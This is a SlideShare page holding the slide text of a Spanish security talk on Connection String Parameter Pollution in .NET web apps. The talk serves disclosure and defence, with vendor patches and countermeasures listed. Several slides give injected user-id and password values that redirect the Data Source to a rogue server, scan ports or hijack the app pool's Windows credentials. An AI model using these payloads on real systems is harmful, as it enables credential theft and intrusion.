SlideShare una empresa de Scribd logo
Chema Alonso Informática 64 Chema Alonso Informática 64
Cadenas de Conexión Definen la manera en que una aplicación web se conecta a un repositorio de datos Hay cadenas de conexión para: Bases de datos Archivos en sistemas de ficheros Servidores LDAP en procesos de Binding …
Cadenas de conexión a BBDD Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword;
Se pueden encontrar en Google
Se pueden encontrar en Google
Ficheros UDL
Credenciales Cuentas de Sistema Operativo Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = SSPI/True/Yes; Cuentas de la Base de datos Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;
Syslogins Tabla usuarios Cadena de conexión 1.- La aplicación web se conecta con credenciales de la BD. 2.- Se piden credenciales al usuario. 3.- La aplicación web comprueba las credenciales en una tabla de usuarios. Select from tabla La aplicación Web controla la autenticación Motor de Base de datos App en Servidor Web Validación usuarios en aplicación web
Syslogins Cadena de conexión 1.- Se piden credenciales al usuario. 2.- La aplicación web construye la cadena de conexión con las credenciales del usuario. El motor de BBDD controla la autenticación Validación usuarios en motor de BBDD Motor de Base de datos App en Servidor Web
Connection String Attacks Es posible inyectar parámetros en las cadenas de conexión separándolos por punto y coma. Data Source = myServerAddress; Initial Catalog = myDataBase; Integrated Security = NO; User Id =  myUsername ; Password =  myPassword; Encryption = Off  ;
ConnectionStringBuiler Incluido en el .NET Framework 2.0 Crea cadenas de conexión mediante parámetros Impide la inyección de código
La realidad
Connection String Parameter Pollution La idea es inyectar un parámetro que ya existe Duplicando el valor del parámetro, el último prevalece en los entornos .NET. Esto permite a un atacante cambiar completamente el funcionamiento de la cadena de conexión y de la aplicación.
CSPP Attack 1: Robo de Hash 1.- Se monta un servidor controlado: Rogue_Server 2.- Se activa un sniffer de credenciales Cain/Wireshark 3.- Se hace una polución del parámetro Data_Source=Rogue_Server 4.- Se fuerza el uso de autenticación Windows Integrated Security=true
CSPP Attack 1: Robo de Hash Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+;  Password=+’ Password_Value ’+;  Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=  ;Data Source=Rogue_Server ;  Password= ;Integrated Security=True ;
CSSP 1:ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning 1.- Se hace una polución del parámetro con el servidor a escanear y el puerto Data_Source=Target_Server,target_Port 2.- Se evalúan los mensajes de error de la aplicación
CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+;  Password=+’ Password_Value ’+;  Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=  ;Data Source=Target_Server, Target_Port ;  Password= Void ;
CSPP 2: myLittleAdmin Puerto Abierto
CSPP 2: myLittleAdmin Puerto Cerrado
CSPP Attack 3: Hijacking Web Credentials 1.- Se hace una polución del parámetro Data_Source=Target_Server 2.- Se fuerza el uso de autenticación Windows Integrated Security=true 3.- El pool de aplicaciones envía la cuenta de Windows con que está corriendo para autenticarse en el motor de bases de datos
CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+;  Password=+’ Password_Value ’+;  Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=  ;Data Source=Target_Server ;  Password= ;Integrated Security=true ;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3: myLittleAdmin/myLittleBackup
CSPP Attack 3: ASP.NET Enterprise Manager
Otras bases de datos MySQL no soporta autenticación integrada Oracle SÍ soporta autenticación integrada en Windows y es posible realizar estos ataques Además es posible cambiar la conexión de nivel para pasarla a conexión como  sysdba
Demo Demo
myLittleAdmin/myLittleBackup myLittleTools ha sacado un advisory de seguridad y un parche
ASP.NET Enterprise Manager ASP.NET Enterprise Manager está “abandonada”, pero se dispone del código fuente
ASP.NET Enterprise Manager ASP.NET Enterprise Manager está “abandonada”, pero se dispone del código fuente
ASP.NET Web Data Admistrator ASP Web Data Administrator es segura en su versión liberada en CodePlex
Contramedidas Fortificación de Firewall Fortificación de cuentas utilizadas en pool de aplicaciones y bases de datos. Usar  ConnectionStringBuilder Filtrar el  ; )
¿Preguntas? Contacto Chema Alonso  [email_address] http://www.informatica64.com http://elladodelmal.blogspot.com Autores Chema Alonso  Manuel Fernández Alejandro Martín Bailón Antonio Guzmán

Más contenido relacionado

PDF
autenticacion apache con mysql
DOCX
Bases de Datos
PDF
Examen Máster Seguridad UEM
PPT
Contaminacion Ambiental=Ingles=
PPT
Tresure hunt
PPT
Treasure hunt yamila
PPTX
Heal the world
PPT
Reciclasmaster
autenticacion apache con mysql
Bases de Datos
Examen Máster Seguridad UEM
Contaminacion Ambiental=Ingles=
Tresure hunt
Treasure hunt yamila
Heal the world
Reciclasmaster

Destacado (20)

PDF
3 r elementos
KEY
Recycle. teach. have fun
PPT
Pollution joaquin cuadrado salazar
PPTX
Pollution
PPSX
PROYECTO "EL RECICLAJE"
PPT
Enviroment pollution
PPTX
Sobrepoblacion
PPTX
Ingles de conversacion
PPTX
Exposición de ingles
PPT
PresentacióN Power Point Ingles
PPT
Deforestacion
PPTX
Temas básicos de ingles 1
PPTX
Power point ingles conversacional
PPTX
Deforestacion presentacion
PPT
Ingles basico 1
PPTX
Exposicion italia en ingles
PPT
Powerpoint deforestacion
PPT
Inglés Básico 1 - Gramatica simple
PPT
Presentación personal
PPT
La deforestación
3 r elementos
Recycle. teach. have fun
Pollution joaquin cuadrado salazar
Pollution
PROYECTO "EL RECICLAJE"
Enviroment pollution
Sobrepoblacion
Ingles de conversacion
Exposición de ingles
PresentacióN Power Point Ingles
Deforestacion
Temas básicos de ingles 1
Power point ingles conversacional
Deforestacion presentacion
Ingles basico 1
Exposicion italia en ingles
Powerpoint deforestacion
Inglés Básico 1 - Gramatica simple
Presentación personal
La deforestación
Publicidad

Similar a Connection String Parameter Pollution (20)

PDF
Ataques a-bases-de-datos
PPT
Trabajo de software
PDF
Sql injection
PDF
Ataques a-bases-de-datos
PPTX
Dprn3 u3 a1_aloo
PPT
Asegúr@IT III - Ataques SQL Injection masivos
PPTX
PDF
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
PDF
All your data are belong to us - FIST Conference 2007
PPT
Ponencia sql avanzado y automatizado
PPTX
Aprendiz unad
PPTX
Aprendiz unad
PPTX
Modoconexion
PDF
Anatomía de un ataque a tns listener
DOCX
Practica sql i,ii
PPTX
Mejores prácticas desarrollo de base de datos
PPT
Administración de base de datos oracle - sesion 2
PDF
Seguridad
PPTX
Tópicos Avanzados de Programación - Unidad 4 Acceso a datos
Ataques a-bases-de-datos
Trabajo de software
Sql injection
Ataques a-bases-de-datos
Dprn3 u3 a1_aloo
Asegúr@IT III - Ataques SQL Injection masivos
Principales vulnerabilidades en Aplicaciones Web - Rediris 2008
All your data are belong to us - FIST Conference 2007
Ponencia sql avanzado y automatizado
Aprendiz unad
Aprendiz unad
Modoconexion
Anatomía de un ataque a tns listener
Practica sql i,ii
Mejores prácticas desarrollo de base de datos
Administración de base de datos oracle - sesion 2
Seguridad
Tópicos Avanzados de Programación - Unidad 4 Acceso a datos
Publicidad

Más de Chema Alonso (20)

PPTX
CyberCamp 2015: Low Hanging Fruit
PDF
Índice Pentesting con Kali 2.0
PDF
Configurar y utilizar Latch en Magento
PPTX
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
PDF
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
PDF
CritoReto 4: Buscando una aguja en un pajar
PDF
Dorking & Pentesting with Tacyt
PDF
Pentesting con PowerShell: Libro de 0xWord
PDF
Foca API v0.1
PDF
Recuperar dispositivos de sonido en Windows Vista y Windows 7
PPTX
It's a Kind of Magic
PPTX
Ingenieros y hackers
PDF
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
PDF
Auditoría de TrueCrypt: Informe final fase II
PPTX
El juego es el mismo
PDF
El Hardware en Apple ¿Es tan bueno?
PDF
Latch en Linux (Ubuntu): El cerrojo digital
PDF
Hacking con Python
PPTX
Shuabang Botnet
PPTX
Tu iPhone es tan (in)seguro como tu Windows
CyberCamp 2015: Low Hanging Fruit
Índice Pentesting con Kali 2.0
Configurar y utilizar Latch en Magento
Cazando Cibercriminales con: OSINT + Cloud Computing + Big Data
New Paradigms of Digital Identity: Authentication & Authorization as a Servic...
CritoReto 4: Buscando una aguja en un pajar
Dorking & Pentesting with Tacyt
Pentesting con PowerShell: Libro de 0xWord
Foca API v0.1
Recuperar dispositivos de sonido en Windows Vista y Windows 7
It's a Kind of Magic
Ingenieros y hackers
Cuarta Edición del Curso Online de Especialización en Seguridad Informática p...
Auditoría de TrueCrypt: Informe final fase II
El juego es el mismo
El Hardware en Apple ¿Es tan bueno?
Latch en Linux (Ubuntu): El cerrojo digital
Hacking con Python
Shuabang Botnet
Tu iPhone es tan (in)seguro como tu Windows

Último (20)

PDF
Maste clas de estructura metálica y arquitectura
PDF
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
PDF
Diapositiva proyecto de vida, materia catedra
PDF
informe_fichas1y2_corregido.docx (2) (1).pdf
PDF
capacitación de aire acondicionado Bgh r 410
PDF
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
PPT
El-Gobierno-Electrónico-En-El-Estado-Bolivia
PPT
introduccion a las_web en el 2025_mejoras.ppt
PPTX
Presentacion de Alba Curso Auditores Internos ISO 19011
PDF
MANUAL de recursos humanos para ODOO.pdf
PPTX
Presentación PASANTIAS AuditorioOO..pptx
PPTX
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
PDF
SAP Transportation Management para LSP, TM140 Col18
PPTX
Propuesta BKP servidores con Acronis1.pptx
PPTX
RAP02 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
PDF
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
PDF
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
PDF
CyberOps Associate - Cisco Networking Academy
PPTX
Power Point Nicolás Carrasco (disertación Roblox).pptx
PPTX
Presentación de Redes de Datos modelo osi
Maste clas de estructura metálica y arquitectura
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
Diapositiva proyecto de vida, materia catedra
informe_fichas1y2_corregido.docx (2) (1).pdf
capacitación de aire acondicionado Bgh r 410
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
El-Gobierno-Electrónico-En-El-Estado-Bolivia
introduccion a las_web en el 2025_mejoras.ppt
Presentacion de Alba Curso Auditores Internos ISO 19011
MANUAL de recursos humanos para ODOO.pdf
Presentación PASANTIAS AuditorioOO..pptx
RAP01 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
SAP Transportation Management para LSP, TM140 Col18
Propuesta BKP servidores con Acronis1.pptx
RAP02 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
CyberOps Associate - Cisco Networking Academy
Power Point Nicolás Carrasco (disertación Roblox).pptx
Presentación de Redes de Datos modelo osi

Connection String Parameter Pollution

  • 1. Chema Alonso Informática 64 Chema Alonso Informática 64
  • 2. Cadenas de Conexión Definen la manera en que una aplicación web se conecta a un repositorio de datos Hay cadenas de conexión para: Bases de datos Archivos en sistemas de ficheros Servidores LDAP en procesos de Binding …
  • 3. Cadenas de conexión a BBDD Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword;
  • 7. Credenciales Cuentas de Sistema Operativo Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = SSPI/True/Yes; Cuentas de la Base de datos Data Source = myServerAddress; Initial Catalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;
  • 8. Syslogins Tabla usuarios Cadena de conexión 1.- La aplicación web se conecta con credenciales de la BD. 2.- Se piden credenciales al usuario. 3.- La aplicación web comprueba las credenciales en una tabla de usuarios. Select from tabla La aplicación Web controla la autenticación Motor de Base de datos App en Servidor Web Validación usuarios en aplicación web
  • 9. Syslogins Cadena de conexión 1.- Se piden credenciales al usuario. 2.- La aplicación web construye la cadena de conexión con las credenciales del usuario. El motor de BBDD controla la autenticación Validación usuarios en motor de BBDD Motor de Base de datos App en Servidor Web
  • 10. Connection String Attacks Es posible inyectar parámetros en las cadenas de conexión separándolos por punto y coma. Data Source = myServerAddress; Initial Catalog = myDataBase; Integrated Security = NO; User Id = myUsername ; Password = myPassword; Encryption = Off ;
  • 11. ConnectionStringBuiler Incluido en el .NET Framework 2.0 Crea cadenas de conexión mediante parámetros Impide la inyección de código
  • 13. Connection String Parameter Pollution La idea es inyectar un parámetro que ya existe Duplicando el valor del parámetro, el último prevalece en los entornos .NET. Esto permite a un atacante cambiar completamente el funcionamiento de la cadena de conexión y de la aplicación.
  • 14. CSPP Attack 1: Robo de Hash 1.- Se monta un servidor controlado: Rogue_Server 2.- Se activa un sniffer de credenciales Cain/Wireshark 3.- Se hace una polución del parámetro Data_Source=Rogue_Server 4.- Se fuerza el uso de autenticación Windows Integrated Security=true
  • 15. CSPP Attack 1: Robo de Hash Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Rogue_Server ; Password= ;Integrated Security=True ;
  • 17. CSPP Attack 2: Port Scanning 1.- Se hace una polución del parámetro con el servidor a escanear y el puerto Data_Source=Target_Server,target_Port 2.- Se evalúan los mensajes de error de la aplicación
  • 18. CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port ; Password= Void ;
  • 19. CSPP 2: myLittleAdmin Puerto Abierto
  • 20. CSPP 2: myLittleAdmin Puerto Cerrado
  • 21. CSPP Attack 3: Hijacking Web Credentials 1.- Se hace una polución del parámetro Data_Source=Target_Server 2.- Se fuerza el uso de autenticación Windows Integrated Security=true 3.- El pool de aplicaciones envía la cuenta de Windows con que está corriendo para autenticarse en el motor de bases de datos
  • 22. CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’ User_Value ’+; Password=+’ Password_Value ’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server ; Password= ;Integrated Security=true ;
  • 23. CSPP Attack 3: Web Data Administrator
  • 24. CSPP Attack 3: myLittleAdmin/myLittleBackup
  • 25. CSPP Attack 3: ASP.NET Enterprise Manager
  • 26. Otras bases de datos MySQL no soporta autenticación integrada Oracle SÍ soporta autenticación integrada en Windows y es posible realizar estos ataques Además es posible cambiar la conexión de nivel para pasarla a conexión como sysdba
  • 28. myLittleAdmin/myLittleBackup myLittleTools ha sacado un advisory de seguridad y un parche
  • 29. ASP.NET Enterprise Manager ASP.NET Enterprise Manager está “abandonada”, pero se dispone del código fuente
  • 30. ASP.NET Enterprise Manager ASP.NET Enterprise Manager está “abandonada”, pero se dispone del código fuente
  • 31. ASP.NET Web Data Admistrator ASP Web Data Administrator es segura en su versión liberada en CodePlex
  • 32. Contramedidas Fortificación de Firewall Fortificación de cuentas utilizadas en pool de aplicaciones y bases de datos. Usar ConnectionStringBuilder Filtrar el ; )
  • 33. ¿Preguntas? Contacto Chema Alonso [email_address] http://www.informatica64.com http://elladodelmal.blogspot.com Autores Chema Alonso Manuel Fernández Alejandro Martín Bailón Antonio Guzmán